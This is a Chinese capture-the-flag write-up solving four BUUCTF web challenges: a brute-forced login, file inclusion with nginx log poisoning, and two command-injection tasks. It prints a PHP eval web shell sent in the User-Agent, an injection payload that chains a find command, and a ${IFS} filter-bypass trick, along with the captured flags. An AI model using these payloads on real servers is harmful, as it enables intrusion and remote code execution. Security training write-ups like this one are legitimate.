BUU BRUTE 1 1
启动靶机后 可以看到 是一个登陆页面
查看源代码:
没有有用的信息 只是单纯的html页面
随便填一个
用户:admin
密码:123
提示密码为四位
怀疑是暴力破解
使用burp进行单点爆破
payload设定
暴力完成 查看length不同的数据包
返回flag:
flag{6982d5b6-a2f8-48d8-aec6-9b27417de3eb}
[ACTF2020 新生赛]Include 1
页面:
源代码:
没有有效信息 点开a标签
像是文件包含 随意构造一个payload
可以看到是nginx的服务器 尝试包含服务器日志文件
/var/log/nginx/access.log
发现:
包含成功
尝试将后门写在ua中传入
<?php eval($_POST['1'])?>
链接成功
得到flag
flag{5d17f6d6-77c5-4973-bb2b-35c090665c32}
[ACTF2020 新生赛]Exec1
可执行命令 怀疑是 命令执行bug
可以使用管道符与grep过滤 操作系统应该是Linux
利用分号隔开各命令
看到一个index.php
该页面为当前页面
构造payload查找文件
127.0.0.1+%7C+grep+seq%3D8+%3B+find / -name "flag.*"
服务器超时
只能对目录进行遍历了
发现flag在根目录下
得到flag
[GXYCTF2019]Ping Ping Ping
毫无头绪
抓包查看 没有有效信息
页面给出的字符像是get请求 尝试get
是命令执行
过滤空格 可以用 <
代替
符号也不行
在Linux下存在环境变量:${IFS}可以进行空格绕过 但有符号 可以直接写$IFS$1
ls查看 发现flag.php
查看flag.php发现存在过滤
查看index:
发现过滤规则
并且发现最终打印出来的是a 直接传递值g给a
输出值a发现是g 尝试利用a绕过
正则匹配 fla$a
测试后 变量a的值可以是l或者g
进行绕过
得到flag